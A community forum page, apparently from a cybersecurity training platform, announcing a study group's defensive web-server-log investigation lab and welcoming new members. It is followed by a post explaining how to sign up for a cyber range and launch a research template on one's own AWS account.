💻🔐 Study Group Vote Revealed! Get Involved! 💻🔐
The Votes are In! This week you asked for a defensive lab for Study Group. What are we studying? This week, we've selected Web Server Logs: Ep.6 — The Tomcat's Out Of The Bagin which it'll be your job to investigate an incident by looking at web server log files. How can I get involved? Dive into the lab: Get started on the lab and challenge yourself to complete it by the end of the week. Join the discussion: Don’t forget to share your experiences, ask questions, and drop any tips or tricks you’ve picked up along the way in this forum discussion. Support each other: This is all about collaboration—whether you’re struggling with a concept or want to share an "aha" moment, jump into the conversation! We’ll re-vote on Friday for next week’s lab, so stay engaged and help shape where this study group goes. Let’s learn together and level up our skills! Every community member who has access to an Immersive license is welcome to join this study group. I'd also like to welcome our new members from last week: jaureguibooksit cmc15 sargentv pepplebryan jp4821a SCepparulo RBlv shahedanara lking2547 Yuknow312 WinChan rob_nolan ohheykhanh ChristopherRouse_80 zooooomer Benjamin LP megangrace oP 4n6cy Joeatt75 Cicada3301 Leslie_Saravia_OHD kpas1868 x0du Garyb aloharae egly443 Sam Thomas0akes Djparker SElder markbaluis07 It's great to have you here! If you're looking for a place to start in this community, partaking in Study Group is the place for you!How to use Immersive cyber ranges for cyber threat research?
Want to know how to take advantage of the cyber ranges platform to do malware and adversary research in a sandboxed environment? In this post, I’ll walk you through how to get access to the Heimdall Detection Engineering template for CTI so you can do just that! The Heimdall template is a domain-joined range that contains workstations, a domain controller, and security tooling that you’d ordinarily find in a real network. The purpose of this template is to enable cyber threat research, where you can launch attacks and malware, capture indicators of compromise through tools like Velociraptor, a SIEM network packet capture tool, and some analyst workstations with a bunch of analysis and reverse engineering tools. With that said, let’s get started. Firstly, you’ll need to go to the cyber ranges sign-up page and sign up with a name and email address. After hitting “Sign up”, you’ll need to go to your email and find the confirmation email to get your credentials, then go back to the cyber ranges website and log in with your new credentials. After signing in, you’ll be in the main ranges dashboard. You’ll need to connect your own Amazon Web Services (AWS) account to use ranges, as provisioning machines will cost money for every hour that they are active or stored. Once you’ve connected your AWS account, you can then go to “Range Templates” and launch the Heimdall range.
